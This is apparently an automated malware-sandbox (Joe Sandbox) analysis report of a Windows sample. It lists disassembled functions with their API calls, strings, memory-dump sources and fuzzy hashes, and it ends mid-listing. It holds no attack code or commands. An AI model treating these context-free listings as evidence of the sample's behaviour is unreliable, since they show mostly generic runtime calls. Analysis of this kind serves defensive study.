MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0071755E
CreateCompatibleDC.GDI32(00000000), ref: 00717565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00717578
SelectObject.GDI32(00000000,00000000), ref: 00717580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0071758B
DeleteDC.GDI32(00000000), ref: 00717594
GetWindowLongW.USER32(?,000000EC), ref: 0071759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007175B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007175BE

Strings

static, xrefs: 007174F6

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: dd043f786c1b513df596a367c92162419c2ac1e6865cdd0fdfb6ec8db466f18e
Instruction ID: 566cf39b2384f6bb3cf0b3c55f6659be758d3a988b89116d7933eee7cc1efe08
Opcode Fuzzy Hash: dd043f786c1b513df596a367c92162419c2ac1e6865cdd0fdfb6ec8db466f18e
Instruction Fuzzy Hash: 25316D72104219BBDF159F68DC09FDA3B7AFF09360F118224FA15A61E0C739D961DBA8

Function 006B6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006B6E3E

Part of subcall function 006B8B28: __getptd_noexit.LIBCMT ref: 006B8B28

__gmtime64_s.LIBCMT ref: 006B6ED7
__gmtime64_s.LIBCMT ref: 006B6F0D
__gmtime64_s.LIBCMT ref: 006B6F2A
__allrem.LIBCMT ref: 006B6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B6F9C
__allrem.LIBCMT ref: 006B6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B6FD1
__allrem.LIBCMT ref: 006B6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B7006
__invoke_watson.LIBCMT ref: 006B7077

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: df8dda4ae46ba3b49e28513ec6986ad9155f9991bc3fd1bc9c6a1ca70224fafc
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: F071F5F6A00716ABD714EE68DC41BEAB3BAEF44324F10812EF514D7381E774DA818B94

Function 006F2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006F2542
GetMenuItemInfoW.USER32(00755890,000000FF,00000000,00000030), ref: 006F25A3
SetMenuItemInfoW.USER32(00755890,00000004,00000000,00000030), ref: 006F25D9
Sleep.KERNEL32(000001F4), ref: 006F25EB
GetMenuItemCount.USER32(?), ref: 006F262F
GetMenuItemID.USER32(?,00000000), ref: 006F264B
GetMenuItemID.USER32(?,-00000001), ref: 006F2675
GetMenuItemID.USER32(?,?), ref: 006F26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006F2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F2735

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: eb5e0f2ecfa076ab1e16ae395bf84ec627e218070c9c80b56c9262243d96506e
Instruction ID: 6e28de34d9e42cdcd499b4e231fcf2baad3b78d19d468fb1d6600e328f2084a3
Opcode Fuzzy Hash: eb5e0f2ecfa076ab1e16ae395bf84ec627e218070c9c80b56c9262243d96506e
Instruction Fuzzy Hash: A9617CB090024EAFDB11DFA8CCA89FEBBBAFB01304F144059EA41A7291D735AD15DF25

Function 00716F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00716FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00716FA8
GetWindowLongW.USER32(?,000000F0), ref: 00716FCC
_memset.LIBCMT ref: 00716FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00716FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00717067

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 68c33e043ba4969f096cc57fa81cc9cee153c561d4c6871deb23088e7e40bff6
Instruction ID: 6f3d744ba823046c87df4ee8a890a18beb710101778fbe241889e46297a154d3
Opcode Fuzzy Hash: 68c33e043ba4969f096cc57fa81cc9cee153c561d4c6871deb23088e7e40bff6
Instruction Fuzzy Hash: 5E617B75900208AFDB10DFA8CC81EEE77F8EB09710F104159FA14AB2E1C779AD85DBA4

Function 006E6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006E6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 006E6C18
VariantInit.OLEAUT32(?), ref: 006E6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 006E6C4A
VariantCopy.OLEAUT32(?,?), ref: 006E6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 006E6CB1
VariantClear.OLEAUT32(?), ref: 006E6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 006E6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006E6CDC
VariantClear.OLEAUT32(?), ref: 006E6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006E6CF9

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 2c673698a52b7b5c22fd66c6dac6730e7d5ae9bb98d602c9ecb931a20aaa6690
Instruction ID: 67d63fea610e9c100f7bac48783bccd49da7aa722375d7e90744daa44d9839b3
Opcode Fuzzy Hash: 2c673698a52b7b5c22fd66c6dac6730e7d5ae9bb98d602c9ecb931a20aaa6690
Instruction Fuzzy Hash: 81416D31A002599FCF00DFA9D8449EEBBBAEF18354F10C069F955A7261DB34A945CFA4

Function 00705732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00705793
inet_addr.WSOCK32(?,?,?), ref: 007057D8
gethostbyname.WSOCK32(?), ref: 007057E4
IcmpCreateFile.IPHLPAPI ref: 007057F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00705862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00705878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 007058ED
WSACleanup.WSOCK32 ref: 007058F3

Strings

Ping, xrefs: 00705816

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 89b226bb870102ad8bd9d9044c6fa9f1d8a5ed3211828d3e068c2b86099b8229
Instruction ID: 8c466ea6518a57b0db040d812ed5d7fd950d4eeea280965c0cb3f158a62b8c54
Opcode Fuzzy Hash: 89b226bb870102ad8bd9d9044c6fa9f1d8a5ed3211828d3e068c2b86099b8229
Instruction Fuzzy Hash: AB516B31604700DFDB50EF29CC45B6A7BE5AB49720F048A29F956DB2E1DB38E800DF55

Function 006FB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006FB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006FB546
GetLastError.KERNEL32 ref: 006FB550
SetErrorMode.KERNEL32(00000000,READY), ref: 006FB5BD

Strings

READONLY, xrefs: 006FB588
INVALID, xrefs: 006FB58F
NOTREADY, xrefs: 006FB57C
UNKNOWN, xrefs: 006FB575
READY, xrefs: 006FB596

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 502da1fc4f3eecf199d56b62983247d60007d1c132f9e37e10a42a8ab073e04b
Instruction ID: 5ad116ff52a20ece41a31acd36e962aedd240240406a2473871abd5dc7fc9170
Opcode Fuzzy Hash: 502da1fc4f3eecf199d56b62983247d60007d1c132f9e37e10a42a8ab073e04b
Instruction Fuzzy Hash: 51318175A0020DEFDB40EF68C845AFD77BAFF05314F108129F60597291DB799A42CB55

Function 006E8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006E9014
GetDlgCtrlID.USER32 ref: 006E901F
GetParent.USER32 ref: 006E903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 006E903E
GetDlgCtrlID.USER32(?), ref: 006E9047
GetParent.USER32(?), ref: 006E9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 006E9066

Strings

ListBox, xrefs: 006E8FD1
ComboBox, xrefs: 006E8F9C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 4de8dc54c313ecb332077272e2cc899d19d2f84453f41ad793643bf2e2d5a59d
Instruction ID: 23afc22c8be4d9089ef553fcdafa5b53c72aac53480ba32927a7aff4d8b621df
Opcode Fuzzy Hash: 4de8dc54c313ecb332077272e2cc899d19d2f84453f41ad793643bf2e2d5a59d
Instruction Fuzzy Hash: 1621D670A00348BBDF05ABA5CC85EFEBB7AEF49310F104119F921972E1DB795819DB24

Function 006E907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006E90FD
GetDlgCtrlID.USER32 ref: 006E9108
GetParent.USER32 ref: 006E9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 006E9127
GetDlgCtrlID.USER32(?), ref: 006E9130
GetParent.USER32(?), ref: 006E914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 006E914F

Strings

ListBox, xrefs: 006E90BC
ComboBox, xrefs: 006E9087

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 4df2d299a884746e3f9984e421f47fe806c42f4e682e8dcff735ec47dd040f09
Instruction ID: 32867e5520089961e0f993d72c993103674dfdca9c1ae60a428ba4debf3a90f8
Opcode Fuzzy Hash: 4df2d299a884746e3f9984e421f47fe806c42f4e682e8dcff735ec47dd040f09
Instruction Fuzzy Hash: 7A21C574A01348BBDF15ABA5CC85EFEBB7AEF48300F10801AF911972A1DB795819DB24

Function 006E9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 006E916F
GetClassNameW.USER32(00000000,?,00000100), ref: 006E9184
_wcscmp.LIBCMT ref: 006E9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006E9211

Strings

largeicons, xrefs: 006E91A5
details, xrefs: 006E91BF
list, xrefs: 006E91F3
smallicons, xrefs: 006E91D9
SHELLDLL_DefView, xrefs: 006E9190

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: b6a0222780e50b56b1e04e2eff55c61808e4d49143e5124ced2b3807ac9668d3
Instruction ID: bc62d5ab38e82830fd417bc0f9bcec811853f6cfbc748022132160914ec90f61
Opcode Fuzzy Hash: b6a0222780e50b56b1e04e2eff55c61808e4d49143e5124ced2b3807ac9668d3
Instruction Fuzzy Hash: 2C1150B624D387BDFE142626EC17DE7379E9F05320B200016FA00A41D1FF6669525668

Function 006F7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 006F7A6C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 5be7fbcbbe08f326d9c0e05d25891407907c36de3133f4eb396086bd0c1760e0
Instruction ID: 51990767acf66374df3d27e9f2d29b552e3452704fd9929d2fc16f9a25c74178
Opcode Fuzzy Hash: 5be7fbcbbe08f326d9c0e05d25891407907c36de3133f4eb396086bd0c1760e0
Instruction Fuzzy Hash: CAB18B7190420E9FDB00DFA8D885BFEB7B6EF09321F244429EA11E7291D734A941CBA4

Function 006F11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006F11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,006F0268,?,00000001), ref: 006F1204
GetWindowThreadProcessId.USER32(00000000), ref: 006F120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0268,?,00000001), ref: 006F121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 006F122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0268,?,00000001), ref: 006F1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006F0268,?,00000001), ref: 006F1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006F0268,?,00000001), ref: 006F129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006F0268,?,00000001), ref: 006F12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006F0268,?,00000001), ref: 006F12BC

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: ed9c764da97b5286ba57108cd7b0c219500a8bcfbbd94f6d73f2bca5b6f0293e
Instruction ID: cc1d995471b594f83da0c28e7b842a83d6de4a3b8080ab4e0d4042737b0c6cd9
Opcode Fuzzy Hash: ed9c764da97b5286ba57108cd7b0c219500a8bcfbbd94f6d73f2bca5b6f0293e
Instruction Fuzzy Hash: 35315475A00308FBDB10DF94EC44BF977AAAB56362F50C115FA05DB2E0D7B89E808B54

Function 0069FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0069FAA6
OleUninitialize.OLE32(?,00000000), ref: 0069FB45
UnregisterHotKey.USER32(?), ref: 0069FC9C
DestroyWindow.USER32(?), ref: 006D45D6
FreeLibrary.KERNEL32(?), ref: 006D463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 006D4668

Strings

close all, xrefs: 0069FAA1

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: e938587d72700cb142dbbbfcd02bc86b1736fa07c6414e6665d46d74352d062b
Instruction ID: 24c007ea3e73fb1ba9cbc78c83bc8f55a4bb87e6b21409cf82c7a87759962500
Opcode Fuzzy Hash: e938587d72700cb142dbbbfcd02bc86b1736fa07c6414e6665d46d74352d062b
Instruction Fuzzy Hash: FBA16A30701212CFDB69EF14C595AA9F76AAF05710F1582AEE80AAB761DF30EC16CF54

Function 00709113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00709167
VariantInit.OLEAUT32(?), ref: 00709238
VariantInit.OLEAUT32(?), ref: 00709339
VariantClear.OLEAUT32(?), ref: 00709343
VariantClear.OLEAUT32(?), ref: 007093A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0070931C
Null Object assignment in FOR..IN loop, xrefs: 007091C8, 007092F6, 007093AE
,,r, xrefs: 007091E5

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,r$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-2506191893
Opcode ID: 81b78619a8ae992e8bcd6ad5501a0b8ce29432d042c51d9d558ca99665a1b246
Instruction ID: 34ea8a09cfc8e999212274f7e83218e3d597b3db4feec6824a3f6b57f59f8ca1
Opcode Fuzzy Hash: 81b78619a8ae992e8bcd6ad5501a0b8ce29432d042c51d9d558ca99665a1b246
Instruction Fuzzy Hash: 1F918E71A00219EBDF24DFA5C848FAEB7B8EF45710F108619FA15AB2C1D7789945CFA0

Function 006EA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,006EA439), ref: 006EA377

Strings

CLASSNN, xrefs: 006EA119
TEXT, xrefs: 006EA2AE
CLASS, xrefs: 006EA0F6
INSTANCE, xrefs: 006EA285
NAME, xrefs: 006EA1A9
REGEXPCLASS, xrefs: 006EA13C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 93df37cd5e3aa88566b909babbd088949008de56f3bf2e9c92457352a3a236bb
Instruction ID: 5307beff802f74bc9850096b52263c6e601c9afe1b0d01924e58d69a55b72619
Opcode Fuzzy Hash: 93df37cd5e3aa88566b909babbd088949008de56f3bf2e9c92457352a3a236bb
Instruction Fuzzy Hash: 1E91E330601745AEDB48EFE1C441BEEFBA7BF04300F54812DE95AA7241DB307A99CBA5

Function 00692E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00692EAE

Part of subcall function 00691DB3: GetClientRect.USER32(?,?), ref: 00691DDC
Part of subcall function 00691DB3: GetWindowRect.USER32(?,?), ref: 00691E1D
Part of subcall function 00691DB3: ScreenToClient.USER32(?,?), ref: 00691E45

GetDC.USER32 ref: 006CCD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006CCD45
